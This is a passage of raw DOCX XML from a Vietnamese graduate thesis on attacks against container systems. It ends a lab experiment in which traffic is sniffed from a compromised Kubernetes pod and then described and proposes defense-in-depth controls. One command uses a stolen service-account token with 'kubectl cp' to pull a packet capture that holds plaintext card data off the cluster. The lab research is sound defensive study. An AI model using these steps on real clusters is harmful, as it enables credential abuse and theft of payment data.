      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bộ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rồi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bấm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhận</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thanh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toán</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Checkout)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F7886" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009823E1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Trích xuất file PCAP về máy tấn công:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> Quay lại shell nc, bấm Ctrl+C để dừng tcpdump. Tại máy Kali Linux, dùng quyền Admin (có được từ bài TN-02) để kéo file pcap ra ngoài máy vật lý:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00671F8E" w14:paraId="2F8216EA" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6E2F8159" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00EC7C59" w:rsidRDefault="00671F8E" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kubectl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --server=$MASTER_URL --token=$TOKEN --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-verify cp default/&lt;POD_FRONTEND&gt;:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>network_traffic.pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>network_traffic.pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CB5D1EC" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00B427E4" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00B427E4">
        <w:t>Phân tích bằng Wireshark: Mở file bằng công cụ Wireshark trên Kali (wireshark network_traffic.pcap), lọc giao thức http, bấm chuột phải vào gói tin /charge chọn Follow -&gt; HTTP Stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56430614" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="003F402A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1284325C" wp14:editId="748CB9B4">
            <wp:extent cx="5170210" cy="3016250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="572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63" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5170927" cy="3016668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D01B5" w14:textId="25213504" w:rsidR="00671F8E" w:rsidRPr="00B427E4" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc233498155"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B427E4">
        <w:t>. Kết quá quá trình khai thác là thông tin thẻ tín dụng của người dùng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="794771CA" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc233498117"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="44E547F2" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Toàn bộ thông tin nhạy cảm của người dùng bao gồm số thẻ tín dụng, mã bảo mật CVV và số tiền giao dịch hiển thị rõ mồn một dưới dạng văn bản thuần (Plaintext). Thực nghiệm chứng minh sự nguy hiểm của cấu hình mạng mặc định trong Kubernetes: chỉ cần một Pod hướng ngoài bị hack, toàn bộ dữ liệu truyền thông </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:lastRenderedPageBreak/>
        <w:t>nội bộ của các Pod lân cận đều có nguy cơ bị nghe lén nếu thiếu cơ chế mã hóa TLS và Network Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD28621" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRPr="00F133D8" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Thử nghiệm đánh giá khoa học và hiệu năng giải pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59707ACD" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRPr="00FA4830" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc233498128"/>
      <w:r w:rsidRPr="00F134D9">
        <w:t xml:space="preserve">Đề án đề xuất mô hình phòng thủ đa lớp (Defense-in-Depth) đồng nhất các công cụ bảo mật (Trivy, Seccomp, PSA, Falco, Calico) theo </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4830">
        <w:t>mô hình</w:t>
      </w:r>
      <w:r w:rsidRPr="00F134D9">
        <w:t xml:space="preserve"> "Shift-Left Security" và "Zero-Trust" nhằm bảo vệ xuyên suốt vòng đời container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23EA02" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRPr="00F133D8" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Sơ đồ kiến trúc logic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="3BD518E8" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D70093" wp14:editId="133DD40F">
            <wp:extent cx="5581650" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="103787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81650" cy="3139440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79294F60" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRPr="009D67A9" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">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giải</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vệ</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container </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đề</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xuất</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B1B5311" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRPr="00FB4013" w:rsidRDefault="00FB4013" w:rsidP="00FB4013"/>
    <w:p w14:paraId="4B1DC10A" w14:textId="77777777" w:rsidR="00AD7DD6" w:rsidRPr="00AD7DD6" w:rsidRDefault="00AD7DD6" w:rsidP="00AD7DD6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD7DD6">
        <w:t>Luồng thực thi của giải pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E32DD" w14:textId="11872162" w:rsidR="00FB4013" w:rsidRPr="00FB4013" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve">Mô hình bảo mật khép kín này vận hành qua </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4013">
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4830">
        <w:t>giai đoạn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E071E2" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve">CI/CD (Build &amp; Ship): Tự động rà quét Trivy, sử dụng Distroless để đảm bảo phần mềm sạch và toàn vẹn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8720E" w14:textId="13146E84" w:rsidR="00FB4013" w:rsidRPr="00FA4830" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve">Registry (Ship): Lưu trữ trong Harbor và chỉ tiếp nhận các image có chứng chỉ ký số hợp lệ. Vận hành (Run): Áp dụng PSA ngăn cấu hình sai, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2BFD">
        <w:t xml:space="preserve">dùng Seccomp chặn </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2BFD">
        <w:lastRenderedPageBreak/>
        <w:t>Syscalls nguy hiểm, triển khai Calico (Zero-Trust)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve"> để cô lập mạng và dùng Falco (eBPF) giám sát thời gian thực. Kiến trúc này tạo vòng lặp bảo mật kín, giúp hệ thống đạt hiệu suất tối ưu (1097.66 rps) trong khi vẫn triệt tiêu các kỹ thuật tấn công từ cấu hình sai đến zero-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C5F53" w14:textId="77777777" w:rsidR="00FB4013" w:rsidRDefault="00FB4013" w:rsidP="00FB4013">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008E01AC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B74B875" wp14:editId="07D53AB9">
            <wp:extent cx="4644924" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="140678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84743" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4656527" cy="2291711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59BC84" w14:textId="4344D8D9" w:rsidR="00FB4013" w:rsidRPr="00AD7DD6" w:rsidRDefault="00FB4013" w:rsidP="00AD7DD6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc233498169"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00452426">
        <w:t>. Hiệu xuất đo lường sau khi triển khải các giải pháp bảo vệ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="2B05E89B" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="003D12D0" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</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chương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5627DFAF" w14:textId="2487576A" w:rsidR="003D12D0" w:rsidRPr="00671F8E" w:rsidRDefault="00AD7DD6" w:rsidP="00AD7DD6">
      <w:r w:rsidRPr="00AD7DD6">
        <w:t>Chương 4 đã hoàn thành việc xây dựng môi trường thực nghiệm với các kịch bản tấn công giả định (PoC) đại diện cho những mối đe dọa thực tế nhất đối với hạ tầng container. Kết quả thực chứng từ ba kịch bản TN-01, TN-02 và TN-03 đã làm sáng tỏ cơ chế leo thang từ lỗi cấu hình sai đặc quyền (privileged) đến việc chiếm quyền Cluster Admin thông qua đánh cắp định danh (Service Account Token) và khai thác mạng phẳng để nghe lén lưu lượng. Những minh chứng này không chỉ khẳng định tính dễ tổn thương của các thiết lập mặc định mà còn cung cấp dữ liệu quan trọng để định hình các yêu cầu phòng thủ trong chương tiếp theo. Đặc biệt, kết quả thử nghiệm hiệu năng cho thấy việc ứng dụng công nghệ eBPF và tối ưu hóa cấu hình nhân Linux không những không gây suy giảm tài nguyên mà còn giúp hệ thống vận hành ổn định và tối ưu hơn (độ trễ 9.11 ms, 1097.66 rps), đáp ứng trọn vẹn yêu cầu bảo mật kiên cố nhưng vẫn gần như trong suốt đối với hiệu năng ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326D5A5" w14:textId="77777777" w:rsidR="00AD7DD6" w:rsidRDefault="00AD7DD6">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc233498130"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CC41C" w14:textId="433FD6F9" w:rsidR="00026BE1" w:rsidRPr="00727AA1" w:rsidRDefault="00026BE1" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r w:rsidRPr="00727AA1">
        <w:lastRenderedPageBreak/>
        <w:t>KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="4570ABD4" w14:textId="5E1E0E38" w:rsidR="001B7593" w:rsidRPr="00010541" w:rsidRDefault="00026BE1" w:rsidP="00F134D9">
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve">Đề án tốt nghiệp mang tên </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Nghiên cứu phương thức tấn công vào hệ thống container"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve"> đã hoàn thành toàn vẹn các mục tiêu đặt ra, mang lại một nghiên cứu có giá trị thực tiễn cao cho lĩnh vực an toàn bảo mật hệ thống phân tán. Đề án đã xây dựng thành công hệ thống cơ sở lý luận vững chắc về kiến trúc container hóa, làm rõ bản chất cô lập của các cơ chế Namespaces và cgroups thuộc nhân Linux. Thông qua quá trình phân tích lý thuyết và thiết lập môi trường phòng thí nghiệm thực nghiệm, đề án đã tái hiện và làm sáng tỏ cơ chế hoạt động của các véc-tơ tấn công nguy hiểm có tính thời sự hiện nay bao gồm tấn công thoát chuồng, lạm dụng cấu hình sai đặc quyền, đánh cắp token điều phối và nghe lén mạng nội bộ microservices</w:t>
      </w:r>
      <w:r w:rsidR="00F134D9" w:rsidRPr="00F134D9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B7593">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373D164" w14:textId="581C02FB" w:rsidR="00044C71" w:rsidRPr="00727AA1" w:rsidRDefault="00044C71" w:rsidP="00F134D9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc233498131"/>
      <w:r w:rsidRPr="00727AA1">
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC CÁC TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
        </w:rPr>
        <w:id w:val="573623776"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:caps/>
            </w:rPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:p w14:paraId="0F577092" w14:textId="77777777" w:rsidR="00D345B6" w:rsidRDefault="00044C71" w:rsidP="00026BE1">
              <w:pPr>
                <w:ind w:firstLine="0"/>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                  <w:noProof/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
                  <w:caps/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
                  <w:caps/>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76"/>
                <w:gridCol w:w="7714"/>
              </w:tblGrid>
